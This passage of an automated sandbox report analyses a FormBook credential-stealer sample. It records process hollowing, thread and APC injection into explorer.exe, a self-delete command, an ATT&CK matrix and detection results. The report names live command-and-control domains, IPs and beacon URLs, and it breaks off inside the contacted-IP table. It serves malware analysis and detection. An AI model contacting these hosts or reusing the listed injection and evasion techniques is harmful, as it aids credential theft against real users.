          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAFF60 mov eax, dword ptr fs:[00000030h]4_2_02FAFF60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]4_2_03060EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]4_2_03060EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]4_2_03060EA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030146A7 mov eax, dword ptr fs:[00000030h]4_2_030146A7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAEF40 mov eax, dword ptr fs:[00000030h]4_2_02FAEF40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FEC0 mov eax, dword ptr fs:[00000030h]4_2_0304FEC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCE730 mov eax, dword ptr fs:[00000030h]4_2_02FCE730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068ED6 mov eax, dword ptr fs:[00000030h]4_2_03068ED6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F94F2E mov eax, dword ptr fs:[00000030h]4_2_02F94F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F94F2E mov eax, dword ptr fs:[00000030h]4_2_02F94F2E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBF716 mov eax, dword ptr fs:[00000030h]4_2_02FBF716
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA70E mov eax, dword ptr fs:[00000030h]4_2_02FCA70E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA70E mov eax, dword ptr fs:[00000030h]4_2_02FCA70E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068D34 mov eax, dword ptr fs:[00000030h]4_2_03068D34
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0301A537 mov eax, dword ptr fs:[00000030h]4_2_0301A537
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305E539 mov eax, dword ptr fs:[00000030h]4_2_0305E539
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013540 mov eax, dword ptr fs:[00000030h]4_2_03013540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03043D40 mov eax, dword ptr fs:[00000030h]4_2_03043D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA849B mov eax, dword ptr fs:[00000030h]4_2_02FA849B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB746D mov eax, dword ptr fs:[00000030h]4_2_02FB746D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030605AC mov eax, dword ptr fs:[00000030h]4_2_030605AC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030605AC mov eax, dword ptr fs:[00000030h]4_2_030605AC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA44B mov eax, dword ptr fs:[00000030h]4_2_02FCA44B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov ecx, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]4_2_03016DC9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCBC2C mov eax, dword ptr fs:[00000030h]4_2_02FCBC2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]4_2_0305FDE2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]4_2_0305FDE2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]4_2_0305FDE2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]4_2_0305FDE2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03048DF1 mov eax, dword ptr fs:[00000030h]4_2_03048DF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]4_2_03051C06
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]4_2_0306740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]4_2_0306740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]4_2_0306740D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016C0A mov eax, dword ptr fs:[00000030h]4_2_03016C0A
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D86B20 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,0_2_00D86B20
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8C043 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8C043
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8C020 SetUnhandledExceptionFilter,0_2_00D8C020
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8C043 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00D8C043
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8C020 SetUnhandledExceptionFilter,2_2_00D8C020
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B7310 SetUnhandledExceptionFilter,4_2_002B7310
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_002B6FE3

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 161.35.25.247 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.209.115.26 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 112.213.89.130 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Users\user\Desktop\RRW9901200241.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3440Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 2A0000Jump to behavior
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'Jump to behavior
          Source: explorer.exe, 00000003.00000000.355976618.0000000004F80000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.346483863.00000000008B8000.00000004.00000020.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.346897457.0000000000EE0000.00000002.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000000.346897457.0000000000EE0000.00000002.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8D757 cpuid 0_2_00D8D757
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_002A96A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,4_2_002A5AEF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_002B3F80
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D883D1 GetLocalTime,0_2_00D883D1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A443C GetVersion,4_2_002A443C

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Command and Scripting Interpreter2Valid Accounts1Valid Accounts1Rootkit1Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Process Injection512Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncSystem Information Discovery124Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339369 Sample: RRW9901200241.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 34 www.monkeytrivia.com 2->34 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 6 other signatures 2->44 11 RRW9901200241.exe 2->11         started        signatures3 process4 signatures5 52 Maps a DLL or memory area into another process 11->52 54 Tries to detect virtualization through RDTSC time measurements 11->54 14 RRW9901200241.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 28 www.unitvn.com 112.213.89.130, 49755, 80 SUPERDATA-AS-VNSUPERDATA-VN Viet Nam 17->28 30 www.toastxpress.com 161.35.25.247, 49748, 80 DIGITALOCEAN-ASNUS United States 17->30 32 5 other IPs or domains 17->32 36 System process connects to network (likely due to code injection or exploit) 17->36 21 cmd.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RRW9901200241.exe35%ReversingLabsWin32.Trojan.Pwsx
          RRW9901200241.exe100%AviraHEUR/AGEN.1106536
          RRW9901200241.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.RRW9901200241.exe.1a00000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.RRW9901200241.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          7852bigbucktrail.info5%VirustotalBrowse
          www.unitvn.com4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.7852bigbucktrail.info/krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          7852bigbucktrail.info
          		18.209.115.26
          		truetrueunknown
          www.toastxpress.com
          		161.35.25.247
          		truetrue
            		unknown
            www.unitvn.com
            		112.213.89.130
            		truetrueunknown
            www.monkeytrivia.com
            		156.238.82.35
            		truefalse
              		unknown
              www.grayfoxden.com
              		unknown
              		unknowntrue
                		unknown
                www.7852bigbucktrail.info
                		unknown
                		unknowntrue
                  		unknown
                  www.catatan-matematika.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.7852bigbucktrail.info/krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                		high
                                http://www.litespeedtech.com/error-pagecmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.krexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.carterandcone.comlexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://fontfabrik.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            112.213.89.130
                                            		unknownViet Nam
                                            		45544SUPERDATA-AS-VNSUPERDATA-VNtrue
